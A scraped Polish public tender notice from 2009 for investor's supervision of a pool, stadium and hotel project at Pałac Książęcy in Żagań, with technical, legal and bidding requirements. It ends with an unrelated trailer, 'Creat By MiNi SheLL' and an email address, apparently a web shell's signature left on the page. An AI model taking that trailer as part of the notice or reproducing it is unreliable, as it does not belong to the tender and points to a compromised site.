        automatyki 36U 600x600 w pomieszczeniu mediów jak zaznaczono na rys. N/2 
        na Ip.  Stąd zostanie  rozprowadzone zasilanie głośników kablem TLGYp 2x1,5, 
        wg schematu  jak na rys. N/3. poprowadzone w korytkach kablowych w 
        przestrzeni ponad sufitowej, przeznaczonych dla sieci słaboprądowych,  
        drogami naniesionymi na rys. N/2. Rozprowadzenie linii sieci nagłaśniającej 
         zostało naniesione na rys. N/1 z podziałem na 4 strefy  zasilania audio. Kable 
        TKGYp 2 x 1,5 zostaną ułożone w  ziemi na  głębokości 0,6 m w rurze 
         ochronnej HDPE 32/2,9 i doprowadzone do punktów emisji dźwięku.  Tam      
         wprowadzone wewnątrz słupów do głośników zgodnie z rys. N/1. W celu 
         pełniejszego wykorzystania systemu nagłośnienia projektuje się instalację 
         gniazda sygnałowego i podłączenie kablem niskotłumieniowym TLGYekw 
         2x2x0,5 do wzmacniacza. Pozwoli to na wydzielenie strefy nagłośnienia w 
         salce szkoleniowej i świetlicy. Ze względu na  wymóg otrzymania dźwięku o 
         właściwej jakości całkowita moc przyłączona do źródła sygnału wynosi: 380 W 
         do pierwszego, 120 W do drugiego i po 90W do trzeciej i czwartej strefy, co 
         zapewni wyraźną i zrozumiałą transmisję muzyki i mowy. Dlatego do instalacji 
         należy  użyć głośników radiowęzłowych do montażu zewnętrznego ZGK -100 i 
         MPLT 30. Najdłuższy odcinek do ostatniego głośnika  w gałęzi wynosi 142,0m. 
         Przy założonych mocach zaprojektowany przekrój kabla jest wystarczający i 
         nie wnosi tłumienia zakłócającego wyrazistość przekazu. Właściwe 
         rozplanowanie umieszczenia głośników uwzględniające pochłanianie mocy 
         akustycznej dźwięku i właściwości rozpraszania, stworzy ergonomiczną i 
         komfortową przestrzeń odsłuchu optymalnie do potrzeb odbiorców. W celu 
         uzyskania dobrego odsłuchu bez efektu pogłosu lub echa, głośniki należy 
         umieścić na wysokości, co najmniej 4,5m na istniejących słupach oświetlenia 
         stadionów.    
         W celu elastycznego użytkowania istniejącego sprzętu i możliwości  
         dynamicznej komutacji sygnałów w szafie automatyki, wszystkie strefy zostaną 
         zakończone w 19 matrycy fonicznej wejść i wyjść układu wzmacniaczy z 
         użyciem PSR-06   (rozdzielnicy sygnałów rozmownych). 
         Wykaz materiałów podstawowych: 
        - kolumna głośnikowa MPLT 30  30W           - 19 szt. 
        - kolumna głośnikowa ZGK -100 100W         -   2 szt. 
        - wzmacniacz WM 6505p                               -   1 szt. 
        - wzmacniacz WM 505p                                 -   1 szt.
        - kabel TLGYp2x1,5                                       - 755 m
        - kabel TLGYekw2x2x0,5                               -  40 m 
        - foniczna  matryca połączeniowa                  -   1 szt.
        - naścienne gniazdo głośnikowe                    -   1 szt.
        - szafa 19   36U600x600                                -   1 szt.
        - rura osłonowa HDPE32/2,9                         -  370 m

2.3. Zakres prac przewidzianych do wykonania w ramach prowadzonego          nadzoru w szczególności obejmuje:

       Zakres prac w szczególności obejmuje: prowadzenie nadzoru inwestorskiego przez zespół inspektorów o odpowiednim przygotowaniu zawodowym w specjalnościach: 
- konstrukcyjno - budowlanej
   w zakresie określonym w art. 25 ustawy z dnia 7 lipca 1994 roku - Prawo budowlane / tj. Dz. U. 2006r, Nr 156, poz. 1118/
Planowana wartość szacunkowa inwestycji /robót budowlanych/ objętej nadzorem inwestorskim   wyniesie ogółem około - 15.045.164,97 złotych netto.  
 
2.4. Zakres czynności inspektora nadzoru będzie w szczególności obejmował:
- zapoznanie się z dokumentacją projektową, warunkami terenowymi i dokumentacją formalno-prawną budowy,
- reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem, pozwoleniem na budowę, ofertą wykonawcy, Specyfikacją Istotnych Warunków Zamówienia, przepisami i zasadami wiedzy technicznej,
- sprawdzanie jakości wykonanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie stosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie
- sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazanie ich do użytkowania,
- potwierdzanie faktycznie wykonanych robót oraz usunięcie wad, a także
  kontrolowanie rozliczeń budowy,
- weryfikację dokumentacji powykonawczej,
- w przypadku konieczności wykonania robót dodatkowych, zamiennych,  ewentualnie zaniechania wykonania pewnych robót, Wykonawca powinien niezwłocznie zawiadomić Zamawiającego oraz przygotować i przedstawić do zatwierdzenia przez Zamawiającego protokół konieczności wykonania robót dodatkowych, zamiennych  bądź robót zaniechanych,
- udział w przeglądach wynikających z zakresu rękojmi i gwarancji na wezwanie Zamawiającego ,
- udział w naradach koordynacyjnych budowy.
- udział w przekazaniu placu budowy

2.5. Z uwagi na specyfikę przedmiotu zamówienia Zamawiający zastrzega, że zamówienie nie może być powierzone do wykonania w całości lub w części podwykonawcom.

2.6. Zaleca się, aby Wykonawca zapoznał się z zakresem planowanych przez Zamawiającego robót budowlanych, a także zdobył na swoją odpowiedzialność i ryzyko wszelkie dodatkowe informacje , które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia.
2.7. Walutą niniejszego przetargu jest : PLN 
2.8. Przedmiot zamówienia jest współfinansowany przez:
       - Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013 Priorytet V Rozwój i modernizacja infrastruktury turystycznej i kulturowej. Działanie 5.1 Rozwój i modernizacja regionalnej infrastruktury turystycznej i kulturowej ,
- z dochodów własnych Zamawiającego
- z kredytu bankowego.

UWAGA!
W związku z tym, ze przedmiot zamówienia ma być dofinansowany ze środków Unii Europejskiej w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013 , Zamawiający zastrzega, że w przypadku nie pozyskania dofinansowania, postępowanie przetargowe będzie unieważnione a Wykonawcom nie będzie przysługiwało jakiekolwiek roszczenie z tego tytułu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  nie żąda od Wykonawcy wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6. Warunki udziału w postępowaniu i sposób dokonania oceny ich spełnienia:
6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w Specyfikacji Istotnych Warunków Zamówienia oraz w Ustawie z dnia 29 stycznia 2004 r. Prawo zamówień Publicznych / t.j.  Dz. U. Nr 223, poz. 1655 ze zmianami Dz. U. z 2008 r., Nr 171, poz. 1058/. Każdy Wykonawca zostanie uznany za spełniającego warunki, jeżeli:
a) posiada uprawnienia do wykonywania określonej działalności lub czynności, 
    jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
b) posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem 
    technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
    technicznego i osób zdolnych do wykonania zamówienia /osoby posiadające 
    stosowne uprawnienia wymagane zgodnie z prawem budowlanym, do 
    pełnienia samodzielnych funkcji technicznych w budownictwie  - 
    wykonywanie nadzoru inwestorskiego. Wymagane uprawnienia w 
    specjalnościach: 
  - konstrukcyjno - budowlanej (ukończone studia wyższe inżynierskie, przygotowanie zawodowe do wykonywania samodzielnej funkcji: projektanta, kierownika budowy w specjalności konstrukcyjno - budowlanej, jest członkiem Izby Inżynierów Budownictwa)
   i wykaże się przynależnością do właściwej izby samorządu zawodowego.
Zamawiający wymaga, aby inspektor o specjalności konstrukcyjno - budowlanej prowadził bezpośredni nadzór nad realizacją:
-  min. 4 obiektów basenowych,
- min. 1 rozbudowy stadionu sportowego,
- min. 1 hotelu współpracującego z basenem
na stanowiskach: inspektora nadzoru lub dyrektora ds. realizacji inwestycji.
Zarządzał pod względem technicznym min. jednym nowowybudowanym lub istniejącym obiektem basenowym przez okres min 1,5 roku.
c) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
   zamówienia,
d) nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
6.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
6.2.1. W przypadku wspólnego ubiegania się, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
6.2.2. Jeżeli oferta Wykonawców ubiegających się  wspólnie o udzielenie zamówienia zostanie wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 7. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca jest zobowiązany dostarczyć następujące oświadczenia oraz dokumenty:  

7.1. Oświadczenie Wykonawcy, że:
 - posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
- posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia /osoby posiadające uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie - wykonywanie nadzoru inwestorskiego - w  specjalnościach o których mowa w pkt. 7.1. lit. b, zgodnie z obowiązującymi przepisami prawa/ 
- znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
- nie podlega wykluczeniu z postępowania o udzielenie zamówienia. 
W przypadku wspólnego ubiegania się / konsorcjum/ oświadczenie składa każdy z Wykonawców oddzielnie.

7.2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności Wykonawca jest zobowiązany złożyć następujące dokumenty:
a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku wspólnego ubiegania się każdy Wykonawca składa oddzielnie.
b) Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą       
uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia , jeżeli takie osoby zostały wskazane w wykazie. W przypadku wspólnego ubiegania się wystarczające jest złożenie w/w dokumentu przez jednego z wykonawców.
c) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia zawodowe do wykonywania samodzielnych funkcji technicznych w budownictwie w określonym zakresie - wykonywanie nadzoru inwestorskiego w specjalnościach:
 - konstrukcyjno - budowlanej (ukończone studia wyższe inżynierskie, przygotowanie zawodowe do wykonywania samodzielnej funkcji: projektanta, kierownika budowy w specjalności konstrukcyjno - budowlanej, jest członkiem Izby Inżynierów Budownictwa).
Zamawiający wymaga aby inspektor o specjalności konstrukcyjno - budowlanej   prowadził bezpośredni nadzór nad realizacją:
-  min. 4 obiektów basenowych,
- min. 1 rozbudowy stadionu sportowego,
- min. 1 hotelu współpracującego z basenem
na stanowiskach: inspektora nadzoru lub dyrektora ds. realizacji inwestycji.
Zarządzał pod względem technicznym min. jednym nowowybudowanym lub istniejącym obiektem basenowym przez okres min 1,5 roku.

7.3. W celu potwierdzenia warunku znajdowania się wykonawcy w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca jest zobowiązany złożyć następujące dokumenty:

- Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
W przypadku wspólnego ubiegania się każdy z wykonawców składa oddzielnie.

7.4.  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów , o których mowa w pkt. 7.2. lit. a składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzając odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

7.5. Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa wyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 

7.6. Dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę, zgodnie z zasadą reprezentacji Wykonawcy wskazaną w dokumencie rejestrowym Wykonawcy albo poprzez osobę umocowaną w sposób właściwy do dokonania czynności poświadczenia dokumentów za zgodność z oryginałem.

7.7. Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub którzy nie złożyli stosownych pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane usługi wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.

7.8. Zamawiający wzywa także, w wyznaczonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń i dokumentów niezbędnych do przeprowadzenia postępowania / spełnienie wymagań określonych przez Zamawiającego.

7.9. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia - nie spełnia. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu  Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych.

7.10. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.palac.zagan.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pałac Książęcy Sp. z o.o. w Żaganiu
ul. Szprotawska 4
68-100 Żagań.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 12:00, miejsce: Zamkniętą kopertę zawierającą ofertę należy złożyć w spółce Pałac Książęcy Sp. z o.o. w Żaganiu, 68-100 Żagań, ul. Szprotawska 4, w pokoju nr 269..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany przez:
       - Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007 - 2013 Priorytet V Rozwój i modernizacja infrastruktury turystycznej i kulturowej. Działanie 5.1 Rozwój i modernizacja regionalnej infrastruktury turystycznej i kulturowej ,
- z dochodów własnych Zamawiającego

Creat By MiNi SheLL
Email: jattceo@gmail.com